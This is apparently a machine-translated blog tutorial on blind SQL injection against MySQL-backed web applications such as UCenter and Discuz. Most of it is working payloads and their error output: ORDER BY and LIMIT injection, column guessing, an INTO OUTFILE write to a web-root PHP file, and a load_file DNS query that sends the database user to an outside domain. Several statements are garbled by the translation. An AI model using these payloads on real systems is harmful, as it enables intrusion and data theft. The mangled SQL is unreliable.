Some alternative blind injection techniques in MySQL Databases

The following articles mainly introduce some practical and useful techniques in the alternative blind injection of MySQL database, I saw some useful and useful information in the alternative blind injection in the MySQL database on the relevant website a few days ago. I think it is quite good and I will share it with you.

Many techniques have been learned from paper abroad, but not many people in China use them.

I. order by parameter injection tips:

Both methods have the same idea.

 
 

  
  
example. “select username,password from uc_members order by”.$_GET['oderby'] 
 
 

A. Common usage methods:

1. [SQL] select username, password from uc_members order by 1, If (select 1) = 2, 1, (select value from uc_settings ));

Returned error: [Err] 1242-Subquery returns more than 1 row

2. [SQL] select username, password from uc_members order by 1, If (select 1) = 1, 1, (select value from uc_settings ));

Returns normal.

B. Methods seen by paper outside China:

1. [SQL] select username, password from uc_members order by 1, (select case when (2 <1) then 1 else 1 * (select username from uc_members) end) = 1;

Returned error: [Err] 1242-Subquery returns more than 1 row

2. [SQL] select username, password from uc_members order by 1, (select case when (2> 1) then 1 else 1 * (select username from uc_members) end) = 1;

Returns normal.

Ii. limit parameter injection tips:

A. The limit parameter injection after order by, because the normal SQL statement order by cannot be followed by union, so there is no good way to solve this problem. The following is an example:

 
 

  
  
into outfile ‘/www/root/xxx.php’; 
 
 

B. If there is no order by injection before limit, it is much more convenient. You can directly connect to the union select statement next to it. You can just add it as you like:

Select * from cdb_members limit 1 union select, 3, 4, 5, 6, 7, 8, 9, 10, 1, 2, 3, 4, 5, 6, 7

You can also use procedure analyze to obtain the field name:

Select * from cdb_members where uid = 1 limit 1, 1 procedure analyze ()

However, procedure analyze cannot be used after order:

[SQL] select * from cdb_members order by uid desc limit 1 procedure analyze ()

[Err] 1386-Can't use ORDER clause with this procedure

3. Tips When fields cannot be guessed:

When the MySQL database version or information_schema cannot be accessed, you cannot guess the field name of a table. Therefore, you can use % 0 in the subquery to obtain the column name. Take uc_members of ucenter as an example.

1. Number of rows to be guessed: SELECT 1 FROM 'uc _ members 'where (SELECT * FROM 'uc _ members') = (1)

Returned error: #1241-Operand shoshould contain 12 column (s)

2. SELECT 1 FROM 'uc _ members 'where (,) = (SELECT * FROM 'uc _ members' union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12 limit 1)

Returns normal.

3. SELECT 1 FROM 'uc _ members 'where (1%,) = (SELECT * FROM 'uc _ members' union select, 5, 6, 7, 8, 9, 10, 11, 12 limit 1)

Returned error: #1048-Column 'uid' cannot be null

4. SELECT 1 FROM 'uc _ members 'where (,) = (SELECT * FROM 'uc _ members' union select, 6, 7, 8, 9, 10, 11, 12 limit 1)

Returned error: #1048-Column 'username' cannot be null

5 .......

Note: Version 5.1 and later are not applicable. The field must be non-null and not null)

4. Blind dns resolution injection in windows:

If the blind injection is very tired, or the page returns the same results regardless of and 1 = 1 or and 1 = 2, using dns for injection is a good method, the premise is that MySQL databases with root permissions in the win environment use the load_file function to read remote files. Build a local dns server and then forward the NS server of a specific domain name. Then inject and capture packets.

The single quotes in actual injection can be encoded locally.): select load_file (concat ('\\\\ aaa1.', (select user ()), '.oldjun.com \ a.txt'). The select result is obtained after packet capture:

29 28.524843 192.168.9.107 192.168.1.2 DNS Standard query A aaa1.root@localhost.oldjun.com